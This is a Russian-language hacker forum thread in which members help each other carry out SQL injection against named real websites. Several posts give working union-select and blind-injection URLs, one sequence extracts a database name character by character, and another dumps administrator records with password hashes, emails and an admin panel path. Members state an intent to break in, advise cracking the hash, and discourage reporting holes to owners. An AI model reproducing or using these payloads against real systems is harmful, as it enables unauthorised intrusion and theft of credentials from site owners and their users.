Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    и в том дело я незнаю как у него обстоят дела, для этого я привел пример под root-ом

    а для того чтобы он узнал user-a привел пример как это узнать
    насчет user-а можешь проверить запросом
    http://test/news/php?id=1+union+select+1,user(),2,3--
     
    1 person likes this.
  2. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21
    и нахрена? не можешь сам раскрутить - забей на него, или опубликуй здесь, а не пали владельцу дыру.

    Может кому-нибудь тут пригодится.
     
  3. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не могу вывести database().
    HTML:
    http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=2 and substring(version(),1,1)=5  
     
  4. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    там нету инъекции...
     
  5. BlackFan

    BlackFan Member

    Joined:
    3 Jan 2009
    Messages:
    47
    Likes Received:
    40
    Reputations:
    32
    2 FlaktW
    Code:
    http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),1,1))=0x64,2,1)
    http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),2,1))=0x62,2,1)
    http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),3,1))=0x31,2,1)
    http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),4,1))=0x39,2,1)
    http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),5,1))=0x37,2,1)
    http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),6,1))=0x35,2,1)
    http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),7,1))=0x31,2,1)
    http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),8,1))=0x33,2,1)
    http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),9,1))=0x5F,2,1)
    db197513_ и так далее..
     
    2 people like this.
  6. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    Это скрипт или программа?
     
  7. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    я думаю что в браузере это вводить надо) но можно как скрипт написать)
     
  8. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Подобрал ордером число колоно - 4
    Выводу юнионом, возникает ошибка
    Invalid query: Unknown table 'C1' in IN/ALL/ANY subquery
     
  9. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Двойной запрос...
     
  10. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Ну я примерно так и понял :)
    Делать-то что?(

    И еще, в другой скуле при юнионе пишет:
    Invalid query: Unknown column 'createTime' in 'field list'

    Как крутить?(
     
  11. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    Попробуй крутить как blind, error-base blind sql injection, не факт, что сработает, но как вариант, думаю можно попробовать
     
  12. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Очень хочется взломать этот сайт! Что можете предложить?


    http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,concat_ws(0x3a,id,
    md5_id,
    full_name,
    user_name,
    user_email,
    user_level,
    pwd,
    address,
    country,
    tel,
    fax,
    website,
    date,
    users_ip,
    approved,
    activation_code,
    banned,
    ckey,
    ctime),6,7,8+from+etrack+--+

    54::admin:admin:admin@localhost:5:4c09e75fa6fe36038ac240e9e4e0126cedef6d8c85cf0a1ae:admin:Switzerland:4433093999:::2010-05-04::1:0:0:uqd1y4v:1272992243

    http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,concat_ws(0x3a,id,
    full_name,
    user_name,
    user_pwd,
    user_email,
    activation_code,
    joined,
    country,
    user_activated),6,7,8+from+users+--+


    6:admin::5f0210ed3fa1e3301e5fac5928cc9712:[email protected]:8971:2008-12-30:India:1


    админка: www.rsgt.com/admin
     
  13. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2FlaktW, конкретно, в чем проблема?
     
  14. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Спасибо, стасок помог уже, раскрутил
     
  15. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Как можно обойти двойной запрос??

    PHP:
    QuerySELECT c.name AS categoryb.category AS category_identb.reported_against AS reported_against_identb.release_fixed AS release_fixed_idents.name AS stateb.state AS state_identb.submit_date AS submit_dateb.submit_time AS submit_timeb.fix_date AS fix_dateb.fix_time AS fix_timeb.synopsis AS synopsisb.duplicate AS duplicateo.name AS osb.os AS os_identb.name AS nameb.email AS emailb.repid AS repid FROM bugs bcategories cstates soslist o WHERE c.ident b.category AND s.ident b.state AND o.ident b.os AND b.ident = -4960 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
     
    1 person likes this.
  16. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    Попасть в админку!
     
  17. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2FlaktW, хэш админа 5f0210ed3fa1e3301e5fac5928cc9712 пробруть, в онлайн базах вроде не нашел
     
  18. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    FlaktW у тебя же есть логин и пароль от админки...
    тут никаких проблем нету..
     
  19. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2GOGA075, blind, error-base blind техники пробовал?
     
  20. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Bb0y дай линк почитать, а то я такого не знаю...
     
Thread Status:
Not open for further replies.